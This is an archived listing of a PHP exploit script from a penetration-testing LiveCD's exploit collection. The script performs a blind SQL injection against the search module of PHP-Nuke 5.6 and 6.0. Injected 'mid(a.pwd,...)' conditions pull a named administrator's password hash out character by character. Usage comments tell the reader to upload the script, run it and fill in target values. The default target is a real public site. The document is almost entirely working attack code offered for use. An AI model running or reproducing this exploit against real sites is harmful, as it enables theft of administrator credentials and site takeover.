home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / phpbb / PHPNukeAutoSelectFishAttacker.php < prev    next >
PHP Script  |  2005-02-12  |  2KB  |  86 lines
  1. <?php
  2.  
  3. ########## PHPnuke Auto-SelectFish Attacker
  4. ########## David@cgishield.com
  5. ########## works on phpnuke 5.6 and 6.0
  6.  
  7. // To use this program, simply upload it to a php enabled webserver, and execute
  8. // If php times out before the whole password hash is determined, 
  9. // adjust the maximum script execution time in php.ini
  10. // Also, replace following with correct values:
  11.  
  12. $server="www.phpnuke.org";
  13. $script="/modules.php";
  14.  
  15. // Title of a story created specifically by the admin who is being hacked.
  16. $data_to_match="Revolution";
  17. $admin_account_name="nukelite";
  18. $beginchar="1";
  19. $endchar="33";
  20.  
  21.  
  22.  
  23. $admin_account_name=urlencode($admin_account_name);
  24. $data_to_match=urlencode($data_to_match);
  25.  
  26. $checkchar[0]="char(48)";
  27. $checkchar[1]="char(49)";
  28. $checkchar[2]="char(50)";
  29. $checkchar[3]="char(51)";
  30. $checkchar[4]="char(52)";
  31. $checkchar[5]="char(53)";
  32. $checkchar[6]="char(54)";
  33. $checkchar[7]="char(55)";
  34. $checkchar[8]="char(56)";
  35. $checkchar[9]="char(57)";
  36. $checkchar[a]="char(97)";
  37. $checkchar[b]="char(98)";
  38. $checkchar[c]="char(99)";
  39. $checkchar[d]="char(100)";
  40. $checkchar[e]="char(101)";
  41. $checkchar[f]="char(102)";
  42.  
  43. for($i=$beginchar;$i<$endchar;$i++){
  44. reset($checkchar);
  45. while (list($i2, $i2val) = @each($checkchar)){
  46.  
  47. $vars="name=Search&query=$data_to_match&topic=&category=&author=$admin_account_name&days=1000+and+mid(a.pwd,$i,1)=$checkchar[$i2]&type=stories";
  48. $data=sendToHost("$server",'post',"$script","$vars");
  49.  
  50. if (eregi("No matches found to your query","$data")){
  51.  
  52. }
  53. else{
  54.  
  55. echo("<br>$i= $i2"); flush();break;}
  56.  
  57. }
  58.  
  59. }
  60.  
  61.  
  62. function sendToHost($host,$method,$path,$data,$useragent=1)
  63. {
  64. $method = strtoupper($method);
  65. $fp = fsockopen($host,80);
  66. fputs($fp, "$method $path HTTP/1.1\n");
  67. fputs($fp, "Host: $host\n");
  68. fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
  69. fputs($fp, "Content-length: " . strlen($data) . "\n");
  70. if ($useragent)
  71. fputs($fp, "User-Agent: Mozilla\n");
  72. fputs($fp, "Connection: close\n\n");
  73. if ($method == 'POST')
  74. fputs($fp, $data);
  75. while (!feof($fp))
  76. $buf .= fgets($fp,128);
  77. fclose($fp);
  78. for($slow=0;$slow<100;$slow++){}
  79.  
  80. return $buf;
  81. }
  82.  
  83.  
  84. ?>
  85.  
  86.